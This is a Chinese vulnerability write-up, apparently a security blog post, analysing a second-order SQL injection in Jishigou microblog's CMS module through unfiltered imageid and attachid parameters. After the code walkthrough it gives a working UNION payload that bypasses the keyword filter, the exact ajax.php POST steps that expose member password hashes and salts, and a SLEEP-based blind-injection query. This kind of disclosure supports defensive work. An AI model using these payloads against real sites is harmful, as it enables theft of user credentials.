记事狗微博2次注入

测试版本:20140124 1 .分析 文件名:cms.mod.php 函数名:addcms 代码: [php] function addcms(){ if (MEMBER_ID < 1) { response_text("请先登录或者注册一个帐号"); } * master.mod.php : $this->Get = &$_GET; $this->Post = &$_POST; * $aid = trim($this->Post['aid']); //传值 没有过滤操作啥的 $title = trim($this->Post['title']); //传值 没有过滤操作啥的 $catid = trim($this->Post['catid']); //传值 没有过滤操作啥的 $content = trim($this->Post['content']); //传值 没有过滤操作啥的 if(!$content){ $content = $title; } if (!$title){response_text("请输入标题");} if (!$catid){response_text("请选择分类");} if (!$content){response_text("请输入内容");} $imageid = trim($this->Post['imageid']); $attachid = trim($this->Post['attachid']); $data = array( 'title' => $title, 'catid' => $catid, 'content' => $content, 'imageid' => $imageid, 'attachid' => $attachid, ); if($aid > 0){ //aid $return = jlogic('cms')->modify($aid,$data); //修改 }else{ $return = jlogic('cms')->create($data); //创建 我们跟进去看看 } if($return >= 0){ if($aid > 0){ response_text("修改成功"); }else{ $str = $return > 0 ? '发布成功' : '发布成功,请等待管理员审核'; response_text($return."|||".$str."|||".date('Y-m-d H:i:s',time())); } }else{ response_text("操作失败,您没有相关操作权限"); } }[/php] 文件名:cms.logic.php 函数名:create 代码: [php] function create($data) { global $_J; $category = $this->Getonecategory($data['catid']); // 判断cms_category 有没有这个值 /* function Getonecategory($catid=0) { $row = DB::fetch_first("SELECT * FROM ".DB::table('cms_category')." WHERE catid = '$catid'"); return $row; } */ if(MEMBER_ID > 0 && $category && (empty($category['purview']) || in_array($_J['member']['role_id'],explode(',',$category['purview'])) || in_array(MEMBER_ID,explode(',',$category['manageid'])))){ $check = $category['verify'] && !in_array(MEMBER_ID,explode(',',$category['manageid'])) && !in_array($_J['member']['role_id'],explode(',',$category['filter'])) ? 0 : 1; $cmsdata = array( 'title' => jhtmlspecialchars($data['title']), 'content' => jhtmlspecialchars($data['content']), 'catid' => $data['catid'], 'imageid' => $data['imageid'], //值 'attachid' => $data['attachid'], //值 'likecatid' => $category['likecatid'], ' likemanageid' => $category['manageid'], 'dateline' => time(), 'uid' => MEMBER_ID, 'username' => MEMBER_NICKNAME, 'check' => $check, ); $aid = DB::insert('cms_article', $cmsdata, true); //入库操作 (sql : INSERT INTO jishigou_cms_article SET `title`='test',`content`='test',`catid`='1',`imageid`='143',`attachid`='aaaaaaaaaaaaa',`likecatid`='0',`likemanageid`='',`dateline`='1390917773',`uid`='1',`username`='admin',`check`='1' ) if($data['imageid']){ // 值是为真 就是说这里有个注入 但是只能盲注把 mysql报错的话 都给记录在文件里了 . DB::query("UPDATE ".DB::table('topic_image')." SET item='cms',itemid={$aid} WHERE id IN(".$data['imageid'].")"); } if($data['attachid']){// 值是为真 就是说这里有个注入 但是只能盲注把 mysql报错的话 都给记录在文件里了 DB::query("UPDATE ".DB::table('topic_attach')." SET item='cms',itemid={$aid} WHERE id IN(".$data['attachid'].")"); } if($check>0){ $this->update_cat_count($data['catid'],1,true); } $topicdata = array( 'content' => cut_str($data['content'], 140, ''), 'imageid' => $data['imageid'], //值 'attachid' => $data['attachid'], //值 'item' => 'cms', 'item_id' => $aid, ); jlogic('topic')->Add($topicdata); //代码太长不贴了 最后 imageid和attachid都给get_ids的过滤了 return $check ? $aid : 0; }else{ return -1; } }[/php] 我们在找找谁操作了jishigou_cms_article这个表 文件名:cms.mod.php 函数名:publish 代码: [php] function publish(){ if(MEMBER_ID < 1){ response_text("

错误:请您先登录后再进行该操作!

"); exit; } $aid = jget('aid'); $fromcatid = $catid = jget('catid'); if($aid){ //aid有值进入 $cmsinfo = jlogic('cms')->getarticlebyid($aid); //跟进去 //好我们回来了 $cmsinfo 就是row 值 $uploadimages = $cmsinfo['images']; if(!$cmsinfo['edit']){ response_text("

错误:您没有相关操作权限!

"); exit; } $catid = $cmsinfo['catid']; } $categoryselect = jlogic('cms')->get_category_html($catid); $h_key = 'cms'; $albums = jlogic('image')->getalbum(); include template('cms/publish'); //看这个包含了模版 我们来看看 文件名: \ cms\publish.html //如果有这个变量存在 //循环便利值  
  }[/php] 文件名:cms.logic.php 函数名:getarticlebyid 代码: [php] $row = DB::fetch_first("SELECT * FROM ".DB::table('cms_article')." WHERE aid = '$aid'"); //查询我们发的文章有木有 if($row){ $row['edit'] = (MEMBER_ID > 0 && (MEMBER_ROLE_TYPE == 'admin' || in_array(MEMBER_ID,explode(',',$row['likemanageid'])) || ($row['uid']==MEMBER_ID && !$row['check']))) ? 1 : 0; if($row['imageid']){ 文章有图片id的话就进来 $query = DB::query("SELECT * FROM ".DB::table('topic_image')." WHERE id IN(".$row['imageid'].")"); //看这里用了 $row['imageid']来查询 而我们$row['imageid']是可以控制的 while ($value = DB::fetch($query)){ //以下一些传值操作 $image = str_replace('./','',str_replace('_o.jpg','_s.jpg',$value['photo'])); $row['images'][$value['id']]['img'] = $value['site_url'] ? $value['site_url'].'/'.$image : $image; //传值 } } if($row['attachid']){ 文章有附件id的话就进来 $query = DB::query("SELECT * FROM ".DB::table('topic_attach')." WHERE id IN(".$row['attachid'].")");//看这里用了 $row['attachid'] 来查询 而我们$row['attachid']是可以控制的 $candown = jclass('member')->HasPermission('uploadattach','down'); $canviewtype = array('doc','ppt','pdf','xls','txt','docx','xlsx','pptx'); //以下一些传值操作 while ($value = DB::fetch($query)){ $attach_url = ($value['site_url'] ? $value['site_url'] : $GLOBALS['_J']['site_url']).'/'.str_replace('./','',$value['file']); echo($value); $row['attachs'][$value['id']]['img'] = 'images/filetype/'.$value['filetype'].'.gif'; // $row['attachs'][$value['id']]['name'] = $value['name']; $row['attachs'][$value['id']]['score'] = $value['score']; $row['attachs'][$value['id']]['onlineview'] = ($candown && in_array($value['filetype'],$canviewtype) && $value['score']==0) ? $attach_url : ''; } } } 最后返回 $row 值 (数据库) //[b][color=Red]在看上一个代码 cms.mod.php[/color][/b] return $row; }[/php] 2.利用 因为 程序里面有一系列的限制 检测到 #, -- ,/**/,load_file,hex,substring,substr,ord,char,benchmark,@,intooutfile,intodumpfile,unionselect,unionall,uniondistinct就终止执行了 [php]SELECT * FROM ".DB::table('topic_image')." WHERE id IN(".$row['imageid'].")[/php] 我们可以这样 [php] 0)UNION(SELECT 1,2,3,nickname,PASSWORD,1,1,1,1,1,1,1,1,1,1,salt,1 FROM jishigou_members[/php] 来绕过它的限制 好了 第一步先发文章 ajax.php?mod=cms&code=addcms (post提交) [php] title=test&catid=1&aid=0&imageid=143&attachid=0)UNION(SELECT nickname,2,3,4,1,1,1,1,PASSWORD,1,1,1,1,1,1,salt,1 FROM jishigou_members [/php] 由于这个程序里默认是没有文章分类的所有还是有点鸡肋把catid 但是盲注也太慢了! 执行完后会给你个 id 我这边是19 返回信息提示:[php] 19|||发布成功|||2014-01-28 22:58:20 [/php] 我去发不了图片。。 第2步 [php] /ajax.php?mod=cms&code=publish post aid=19 [/php] 密码就显示出来 3.后话 过滤所有的 $imageid $attachid 里面还有其他的盲注也是这两个变量造成的 例如发送私信那里 盲注: [php] SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 43, NULL, SLEEP(1)) FROM jishigou_members[/php]

发表评论